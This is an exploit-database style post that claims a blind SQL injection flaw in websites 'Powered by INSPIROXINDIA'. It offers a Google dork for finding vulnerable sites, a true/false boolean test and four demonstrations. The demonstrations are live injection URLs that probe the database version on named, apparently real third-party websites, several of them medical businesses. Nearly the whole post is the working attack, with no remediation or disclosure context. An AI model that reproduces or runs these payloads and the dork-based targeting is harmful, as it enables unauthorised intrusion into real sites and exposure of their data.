*********************************************************
#Exploit Title: Powered by INSPIROXINDIA - Blind Sql Injection Vulnerability
#Date: 2022-01-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by INSPIROXINDIA"
#Category:webapps
#Tested On: windows 10, Firefox

[+] search Dork : "Powered by INSPIROXINDIA"
 
[+] First add "and true" and then "and false" to the end of the link :

* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false


### Demo 1:
* http://globalpathology.co.in/product.php?id=1230%27%20true--+
* http://globalpathology.co.in/product.php?id=1230%27%20false--+
* http://globalpathology.co.in/product.php?id=1230%27%20and%20substring(@@version,1,1)=5--+

### Demo 2:
* http://drrichaaroramiglani.com/product.php?id=2840%27%20and%20true--+
* http://drrichaaroramiglani.com/product.php?id=2840%27%20and%20false--+
* http://drrichaaroramiglani.com/product.php?id=2840%27%20and%20substring(@@version,1,1)=5--+

### Demo 3:
* http://nmccc.co.in/page.php?id=442%27%20and%20true--+
* http://nmccc.co.in/page.php?id=442%27%20and%20false--+
* http://nmccc.co.in/page.php?id=442%27%20and%20substring(@@version,1,1)=5--+

### Demo 4:
* gamcamedicalservices.com/product.php?id=8298'%20and%20true--+
* gamcamedicalservices.com/product.php?id=8298'%20and%20false--+
* gamcamedicalservices.com/product.php?id=8298'%20and%20substring(@@version,1,1)=5--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************